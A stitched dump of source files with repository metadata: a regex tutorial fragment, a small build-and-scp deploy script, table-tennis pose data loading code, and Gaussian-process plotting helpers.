print(mo1.group())
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batwoman")
print(mo1.group())
batRegex = re.compile(r"Bat(wo)*man")
mo1 = batRegex.search("The Adventures of Batwowowowoman")
print(mo1.group())
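# (wo)* matches zero or more repetitions of 'wo', so the three searches
# print 'Batman', 'Batwoman', and 'Batwowowowoman' respectively.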
| 24.571429 | 57 | 0.723837 | 53 | 344 | 4.698113 | 0.339623 | 0.120482 | 0.204819 | 0.216867 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0.803213 | 0 | 0.019417 | 0.101744 | 344 | 13 | 58 | 26.461538 | 0.786408 | 0 | 0 | 0.6 | 0 | 0 | 0.334302 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.1 | 0.3 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
bda927fa79808b39d68457c140941db211ab0fd9 | 232 | py | Python | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | Serever/compile.py | Erictriangle/MngX | f7fbcc1514f4d24dd2b1dbe237973fefbd7164b0 | [
"BSL-1.0"
] | null | null | null | #!/usr/bin/python3
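# Build the C++ server against a local Boost install, then copy the
# resulting binary to the deployment host with scp.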
import os
import sys
os.system("clang++ server.cpp -o Server -I /home/eric/d/Library/boost/include -L /home/eric/d/Library/boost/lib -lpthread")
os.system("scp Server eric@192.168.100.61:/home/eric")
| 23.2 | 124 | 0.693966 | 40 | 232 | 4.025 | 0.65 | 0.149068 | 0.111801 | 0.198758 | 0.26087 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059406 | 0.12931 | 232 | 9 | 125 | 25.777778 | 0.737624 | 0.073276 | 0 | 0 | 0 | 0.25 | 0.740196 | 0.460784 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
bdd69e7c26e37ec80d5bff1e5fa792846a1a2715 | 16,950 | py | Python | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 4 | 2021-09-26T11:41:16.000Z | 2022-01-07T20:41:37.000Z | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 1 | 2022-02-03T10:55:28.000Z | 2022-02-03T10:55:28.000Z | src/data.py | wutonytt/Camera-Based-Table-Tennis-Posture-Analysis | 26cc5be09d4ecf654d5a6fa72cc54d78a5e45798 | [
"MIT"
] | 1 | 2022-01-24T23:44:09.000Z | 2022-01-24T23:44:09.000Z | import os, json
import pandas as pd
import numpy as np
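# Column names for the 25 OpenPose keypoints (X, Y, confidence P) over the
# three consecutive frames: 3 * 25 * 3 = 225 values per detection. Built
# programmatically to replace the long hand-written lists, which also
# duplicated 'First_P10'/'Second_P10'/'Third_P10' where 'P20' was intended.
KEYPOINT_COLS = ['{}_{}{}'.format(frame, axis, i)
                 for frame in ('First', 'Second', 'Third')
                 for i in range(25)
                 for axis in ('X', 'Y', 'P')]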
def loadTrainData(dirPath, numOfSet):
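    """Load OpenPose keypoint JSONs for training sets 1..numOfSet.

    Frames are read in triples. A detection is assigned to the right-hand
    player when more than 15 of its keypoint x-coordinates are >= 700, and
    to the left-hand player when more than 15 are <= 200. Returns one row
    per player per frame triple with X/Y coordinates (confidence columns
    dropped), plus train_num, file_num and a left/right flag.
    """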
train = pd.DataFrame()
for d in range(1, numOfSet + 1):
# print(dirPath)
dirpath = os.path.join(dirPath, 'train_' + str(d))
path = os.path.join(dirPath, 'train_' + str(d) + '/' + str(d) + '_')
numOfFiles = len([name for name in os.listdir(dirpath) if os.path.isfile(os.path.join(dirpath, name))]) - 3
# print(numofFiles)
for file_num in range(0, numOfFiles, 3):
file1 = open(path + str(file_num).zfill(12) + '_keypoints.json')
file2 = open(path + str(file_num+1).zfill(12) + '_keypoints.json')
file3 = open(path + str(file_num+2).zfill(12) + '_keypoints.json')
j1 = json.load(file1)
j2 = json.load(file2)
j3 = json.load(file3)
leftData = [[]]
rightData = [[]]
for j in [j1, j2, j3]:
                if j['people']:
for i in j['people']:
counterr = 0
for k in i['pose_keypoints_2d'][::3]:
if (k >= 700):
counterr += 1
if (counterr > 15):
rightData[0] += i['pose_keypoints_2d']
counterl = 0
for k in i['pose_keypoints_2d'][::3]:
if (k <= 200):
counterl += 1
if (counterl > 15):
leftData[0] += i['pose_keypoints_2d']
if (len(leftData[0]) == 225):
leftData = [d] + [file_num] + leftData[0]
                dfl = pd.DataFrame([leftData], columns=['train_num', 'file_num'] + KEYPOINT_COLS)
dfl['left/right'] = 0
train = train.append(dfl, ignore_index=True)
if (len(rightData[0]) == 225):
rightData = [d] + [file_num] + rightData[0]
                dfr = pd.DataFrame([rightData], columns=['train_num', 'file_num'] + KEYPOINT_COLS)
dfr['left/right'] = 1
train = train.append(dfr, ignore_index=True)
train = train.drop(list(train.filter(like='P', axis=1)), axis = 1)
return train
def loadTestData(dirPath, frontName):
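    """Load OpenPose keypoint JSONs from a single test directory.

    Uses the same frame-triple and left/right assignment logic as
    loadTrainData, but without a train_num column.
    """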
test = pd.DataFrame()
path = os.path.join(dirPath, frontName)
numOfFiles = len([name for name in os.listdir(dirPath) if os.path.isfile(os.path.join(dirPath, name))]) - 3
for file_num in range(0, numOfFiles, 3):
file1 = open(path + str(file_num).zfill(12) + '_keypoints.json')
file2 = open(path + str(file_num+1).zfill(12) + '_keypoints.json')
file3 = open(path + str(file_num+2).zfill(12) + '_keypoints.json')
j1 = json.load(file1)
j2 = json.load(file2)
j3 = json.load(file3)
leftData = [[]]
rightData = [[]]
for j in [j1, j2, j3]:
            if j['people']:
for i in j['people']:
counterr = 0
for k in i['pose_keypoints_2d'][::3]:
if (k >= 700):
counterr += 1
if (counterr > 15):
rightData[0] += i['pose_keypoints_2d']
counterl = 0
for k in i['pose_keypoints_2d'][::3]:
if (k <= 200):
counterl += 1
if (counterl > 15):
leftData[0] += i['pose_keypoints_2d']
if (len(leftData[0]) == 225):
leftData = [file_num] + leftData[0]
            dfl = pd.DataFrame([leftData], columns=['file_num'] + KEYPOINT_COLS)
dfl['left/right'] = 0
test = test.append(dfl, ignore_index=True)
if (len(rightData[0]) == 225):
rightData = [file_num] + rightData[0]
            dfr = pd.DataFrame([rightData], columns=['file_num'] + KEYPOINT_COLS)
dfr['left/right'] = 1
test = test.append(dfr, ignore_index=True)
test = test.drop(list(test.filter(like='P', axis=1)), axis = 1)
return test
def addTrainLabel(train, labelFile):
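    """Inner-join stroke labels from labelFile (CSV) onto the training frames."""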
labeldf = pd.read_csv(os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/' + labelFile)
    # iterrows() yields copies, so assigning to `row` never updated labeldf;
    # snap file_num to the nearest multiple of 3 directly on the frame so
    # labels line up with the frame triples.
    labeldf['file_num'] = (labeldf['file_num'] / 3).round().astype(int) * 3
train = pd.merge(train, labeldf, on=['train_num', 'file_num','left/right'], how = 'inner')
return train
def addTestLabel(test, labelFile, test_num):
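    """Inner-join labels for the held-out set test_num onto the test frames."""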
labeldf = pd.read_csv(os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + '/' + labelFile)
    # Same fix as addTrainLabel: mutate the frame itself, not iterrows() copies.
    labeldf['file_num'] = (labeldf['file_num'] / 3).round().astype(int) * 3
labeldf = labeldf[labeldf['train_num'] == test_num]
test = pd.merge(test, labeldf, on=['file_num','left/right'], how = 'inner')
return test
def dataAugmentation(train):
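    """Augment by jittering coordinates: forehand rows are copied with every
    integer offset in [-5, 5] (zero skipped), backhand rows with offsets in
    [-7, 7], applied to all coordinate columns."""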
tmp0 = train.copy()
fore = tmp0[tmp0['fore/back'] == 1]
back = tmp0[tmp0['fore/back'] == 0]
# fore
for i in range(-5,6):
tmp = fore.copy()
if i == 0 :
continue
cols = train.iloc[:,2:-1].columns
tmp[cols] += i
train = train.append(tmp, ignore_index=True)
# back
for i in range(-7,8):
tmp = back.copy()
if i == 0 :
continue
cols = train.iloc[:,2:-1].columns
tmp[cols] += i
train = train.append(tmp, ignore_index=True)
    return train
 | 113 | 2,923 | 0.639056 | 2,475 | 16,950 | 3.985051 | 0.074343 | 0.015614 | 0.011356 | 0.012978 | 0.939167 | 0.931765 | 0.931765 | 0.92041 | 0.914935 | 0.899118 | 0 | 0.109883 | 0.15115 | 16,950 | 150 | 2,924 | 113 | 0.575619 | 0.002478 | 0 | 0.65812 | 0 | 0 | 0.504969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042735 | false | 0 | 0.025641 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
da0c4b2d96c9567e863314be9709a0e1545bd773 | 24,735 | py | Python | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 6 | 2021-01-08T10:55:23.000Z | 2021-11-26T08:36:28.000Z | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 1 | 2021-08-25T16:09:37.000Z | 2021-08-25T16:09:37.000Z | steingp/plotters.py | thomaspinder/SteinGP | 2d9a44c2a5bcb59e0cb26e9c3acd307a16c47bdc | [
"Apache-2.0"
] | 1 | 2021-01-12T19:37:28.000Z | 2021-01-12T19:37:28.000Z | import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from mpl_toolkits.axes_grid1 import make_axes_locatable
from numpy import ndarray
from gpflow.models import GPModel
def plot_boundary(m: GPModel, X: ndarray, y: ndarray, ax=None):
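    """Plot the two classes and the model's p=0.5 decision contour on a 40x40 grid."""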
x_grid = np.linspace(min(X[:, 0]), max(X[:, 0]), 40)
y_grid = np.linspace(min(X[:, 1]), max(X[:, 1]), 40)
xx, yy = np.meshgrid(x_grid, y_grid)
Xplot = np.vstack((xx.flatten(), yy.flatten())).T
mask = y[:, 0] == 1
p, _ = m.predict_y(Xplot) # here we only care about the mean
if ax is None:
fig, ax = plt.subplots(figsize=(10, 5))
# plt.figure(figsize=(7, 7))
ax.plot(X[mask, 0], X[mask, 1], "oC0", mew=0, alpha=0.5, label="1")
ax.plot(X[np.logical_not(mask), 0],
X[np.logical_not(mask), 1],
"oC1",
mew=0,
alpha=0.5,
label="0")
_ = ax.contour(
xx,
yy,
p.numpy().reshape(*xx.shape),
[0.5], # plot the p=0.5 contour line only
colors="k",
linewidths=1.8,
zorder=100,
)
ax.legend(loc='best')
ax.axis("off")
def make_predictive_plot(ax,
dataset,
mu: ndarray,
sigma: ndarray,
lik='gaussian',
plt_type="testing"):
X, Y, Xte, Yte = dataset
    test_type = ax.scatter if lik == 'bernoulli' else ax.plot
    test_label = "Testing points" if plt_type == "testing" else plt_type
test_type(Xte, Yte.flatten(), label=test_label, color="green", alpha=0.5)
ax.plot(Xte, mu, label="Predictive mean", color="blue")
ax.fill_between(Xte[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
ax.plot(X, Y, 'o', color="black", markersize=5, label="Training points")
handles, labels = ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
ax.legend(handles, labels, loc='upper left')
ax.set_xlabel("X")
ax.set_ylabel("Y")
return ax
def progress_plot(ax, progress, model_name: str):
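    """Plot one model's marginal log-likelihood trace on ax."""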
ax.plot(progress, label=model_name, linewidth=2)
ax.set_xlabel("Optimisation iteration")
ax.set_ylabel("Marginal log-likelihood")
ax.legend(loc="lower right")
def make_gpr_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
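    """Three-panel regression summary: predictive fit with 95% band, the MLL
    optimisation trace, and the final SVGD particles; saved to plots/ or,
    when gif=True, to the gif frame folder."""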
n_iter = len(logf)
# adam_mll = pd.read_csv("quick_svgd/adam_1particle_comparison.csv")
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="SteinGP", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(
0.5,
0.96,
"Recovering a realisation from a GP with lengthscale=0.2, variance=0.3 and obs. noise=0.2",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("plots/regression.png")
plt.close(fig)
def plot_K(K, dK, iteration, filename):
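    """Render the kernel matrix and its derivative as side-by-side heatmaps
    with colorbars and save the figure under quick_svgd/kernels/."""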
with plt.style.context("seaborn-notebook"):
fig, ax = plt.subplots(nrows=1, ncols=2, figsize=(16, 6))
im1 = ax[0].imshow(K)
# ax[0].spines['top'].set_visible(False)
# ax[0].spines['bottom'].set_visible(False)
# ax[0].spines['right'].set_visible(False)
# ax[0].spines['left'].set_visible(False)
# ax[0].tick_params(left=False, right=False, top=False, bottom=False)
# # Turn off tick labels
# ax[0].set_yticklabels([])
# ax[0].set_xticklabels([])
ax[0].set_title("Kernel matrix")
divider = make_axes_locatable(ax[0])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im1, cax=cax, orientation='vertical')
im2 = ax[1].imshow(dK)
# ax[1].spines['top'].set_visible(False)
# ax[1].spines['bottom'].set_visible(False)
# ax[1].spines['right'].set_visible(False)
# ax[1].spines['left'].set_visible(False)
# ax[1].tick_params(left=False, right=False, top=False, bottom=False)
# # Turn off tick labels
# ax[1].set_yticklabels([])
# ax[1].set_xticklabels([])
ax[1].set_title("Kernel derivative")
# at = AnchoredText("Iteration: {}".format(iteration),
# prop=dict(size=15), frameon=True,
# loc='lower right',
# )
# at.patch.set_boxstyle("round,pad=0.,rounding_size=0.2")
# ax[1].add_artist(at)
fig.suptitle('Iteration: {}'.format(iteration), fontsize=16)
divider = make_axes_locatable(ax[1])
cax = divider.append_axes('right', size='5%', pad=0.05)
fig.colorbar(im2, cax=cax, orientation='vertical')
# plt.tight_layout()
plt.savefig("quick_svgd/kernels/{}".format(filename))
plt.close()
def make_sgpr_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(
0.5,
0.96,
"Recovering a realisation from a GP with lengthscale=0.2, variance=0.3 and obs. noise=0.2",
wrap=True,
horizontalalignment='center',
fontsize=12)
plt.show()
# if gif:
# plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
# int((n_iter - 1) / 10)))
# else:
# plt.savefig("quick_svgd/sgpr_output.png")
plt.close(fig)
def make_breathe_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
Xte,
Yte,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
adam_mll = pd.read_csv("quick_svgd/adam_1particle_comparison.csv")
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
# mll_ax.plot(adam_mll, label="Adam Opt.", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="True data_old",
color="green",
alpha=0.5)
predict_ax.plot(Xte, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xte[:, 0],
mu[:, 0] - 1.96 * sigma[:, 0],
mu[:, 0] + 1.96 * sigma[:, 0],
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
# TODO: Fix inducing point plot
# predict_ax.plot(model.inducing_variable.Z.numpy(),
# 'o',
# color="black",
# markersize=6,
# label="Inducing points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for p, lab, col, pa in zip(particles,
['Lengthscale', 'Variance', 'Obs. noise'],
cols[:particles.shape[0]],
model.trainable_parameters):
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1],
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.94,
"Predictions of the Whitecross AQ station",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("quick_svgd/breathe_output.png")
plt.close(fig)
def complement(l, universe=None):
"""
Return the complement of a list of integers, as compared to
a given "universe" set. If no universe is specified,
consider the universe to be all integers between
the minimum and maximum values of the given list.
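
    e.g. complement([1, 2, 4]) -> [3]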
"""
if universe is not None:
universe = set(universe)
else:
universe = set(range(min(l), max(l) + 1))
return sorted(universe - set(l))
def make_gpmc_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull,
Yfull.flatten(),
label="Latent function",
color="green",
alpha=0.5)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.plot(X,
Y,
'o',
color="black",
markersize=5,
label="Training points")
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for idx, (p, lab, col, pa) in enumerate(
zip(particles, [
'', 'Matern Lengthscale', 'Matern Variance',
'Bias Variance', "obs_noise"
], cols[:particles.shape[0]], model.trainable_parameters)):
if idx != 0:
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1] + 0.1,
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col,
markersize=5,
alpha=0.8)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.96,
"SVGD to fit exponential data_old",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("quick_svgd/exponential_nparticles_gaussian.png")
plt.close(fig)
def make_bern_plot(model,
particles,
Xfull,
Yfull,
X,
Y,
mu,
sigma,
logf,
gif=False):
n_iter = len(logf)
samples = model.predict_f_samples(Xfull, 10).numpy().squeeze().T
with plt.style.context("seaborn-notebook"):
fig = plt.figure(figsize=(18, 8))
layout = (2, 2)
predict_ax = plt.subplot2grid(layout, (0, 0), colspan=2)
mll_ax = plt.subplot2grid(layout, (1, 0))
particle_ax = plt.subplot2grid(layout, (1, 1))
mll_ax.plot(logf, label="steingp", linewidth=2)
mll_ax.set_xlabel("Optimisation iteration")
mll_ax.set_ylabel("Marginal log-likelihood")
mll_ax.legend(loc="lower right")
if gif:
mll_ax.set_ylim(-70, -20)
predict_ax.plot(Xfull, mu, label="Predictive mean", color="blue")
predict_ax.fill_between(Xfull[:, 0],
mu[:, 0].numpy() - 1.96 * sigma[:, 0].numpy(),
mu[:, 0].numpy() + 1.96 * sigma[:, 0].numpy(),
alpha=0.2,
label="Predictive_uncertainty",
color="blue")
predict_ax.scatter(X,
Y,
marker='o',
color="red",
label="Training points",
alpha=0.7)
predict_ax.scatter(Xfull,
Yfull.flatten(),
marker="x",
label="Original dataset",
color="green",
alpha=0.7)
handles, labels = predict_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
predict_ax.legend(handles, labels, loc='upper left')
predict_ax.set_xlabel("X")
predict_ax.set_ylabel("Y")
if gif:
predict_ax.set_ylim(-1.75, 2.25)
cols = plt.rcParams['axes.prop_cycle'].by_key()['color']
for idx, (p, lab, col, pa) in enumerate(
zip(particles, [
'', 'Matern Lengthscale', 'Matern Variance',
'Bias Variance', "obs_noise"
], cols[:particles.shape[0]], model.trainable_parameters)):
if idx != 0:
particle_ax.axhline(pa.transform(np.mean(p)).numpy(),
alpha=0.7,
color=col)
particle_ax.text(particles.shape[1] + 0.1,
pa.transform(np.mean(p)).numpy(),
"{} mean".format(lab))
particle_ax.plot(pa.transform(p).numpy(),
'o',
label=lab,
color=col,
markersize=5,
alpha=0.8)
handles, labels = particle_ax.get_legend_handles_labels()
labels, ids = np.unique(labels, return_index=True)
handles = [handles[i] for i in ids]
particle_ax.legend(handles, labels, loc='best')
particle_ax.set_xlabel("Particle index")
particle_ax.set_ylabel("Particle value")
particle_ax.set_title("Final SVGD particles")
particle_ax.set_xticks(np.arange(particles.shape[1] + 1))
if gif:
particle_ax.set_ylim(-0.2, 0.8)
plt.tight_layout()
plt.figtext(0.5,
0.96,
"SVGD to fit exponential data_old",
wrap=True,
horizontalalignment='center',
fontsize=12)
if gif:
plt.savefig("quick_svgd/gif/{}_signal_recovery.png".format(
int((n_iter - 1) / 10)))
else:
plt.savefig("plots/toy_data/bernoulli_nparticles.png")
plt.close(fig)
| 40.350734 | 103 | 0.488741 | 2,760 | 24,735 | 4.239493 | 0.114493 | 0.025212 | 0.027775 | 0.029485 | 0.818477 | 0.800444 | 0.769592 | 0.757286 | 0.751645 | 0.747543 | 0 | 0.029205 | 0.385365 | 24,735 | 612 | 104 | 40.416667 | 0.740446 | 0.06699 | 0 | 0.80381 | 0 | 0.00381 | 0.104346 | 0.019774 | 0 | 0 | 0 | 0.001634 | 0 | 1 | 0.019048 | false | 0 | 0.011429 | 0 | 0.034286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da3563047c6e60c20941187335c4f3a31f8afa3c | 6,143 | py | Python | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
] | null | null | null | inventory/inventory/report/inventory_ledger/inventory_ledger.py | riconova92/inventory | 7cc4f49bda31f802af36ee4ea6eb43092b5094a7 | [
"MIT"
